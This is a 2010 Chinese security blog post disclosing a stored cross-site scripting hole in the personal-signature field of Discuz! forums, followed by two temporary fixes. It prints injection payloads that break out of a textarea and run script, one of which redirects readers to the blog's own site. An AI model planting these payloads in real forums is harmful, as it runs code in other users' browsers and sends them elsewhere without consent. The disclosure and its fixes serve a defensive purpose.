Discuz!个性签名跨站漏洞

发布:si1ence | 分类:网络安全 | 浏览:

18 Apr 2010

国内很多论坛都用的Discuz!    大家对dz的研究更多了Discuz! 个人中心里的“个人签名”没有对恶意代码进行检测,在 Discuz! 及 img 代码禁用的情况下仍可写入恶意代码,Discuz! 会保存并执行该代码,形成永久型跨站。该漏洞可能导致蠕虫病毒的传播。

 

虽便选个 Discuz! 论坛我们注册一个用户!
并输入跨站脚本代码 , 以我们个人的签名!
代码:
</textarea><script>alert(/si1ence/);</script><textarea>
也可以写成这样:</textarea><script>alert(/注册成功/);location.href=/http://www.si1ence.cn/;</script><textarea>

 

临时解决办法:
1、修改 memcp.php 代码,过滤个人签名字符。

2、禁止用户使用个人签名


分享到:

原创文章如转载,请注明:转载自si1ence'blog [ http://www.si1ence.cn/ ]
本文链接地址:http://www.si1ence.cn/wangluoanquan/33/

上一篇: 下一篇:

0评论 - Discuz!个性签名跨站漏洞

发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于

关注网络安全,掌握网络资讯与病毒防,IT资讯,搜索引擎优化(SEO)技术分?Emai:master#si1ence.cn(#改为@)

TAGS列表

最近发表

随机文章

本月浏览排行

最近评论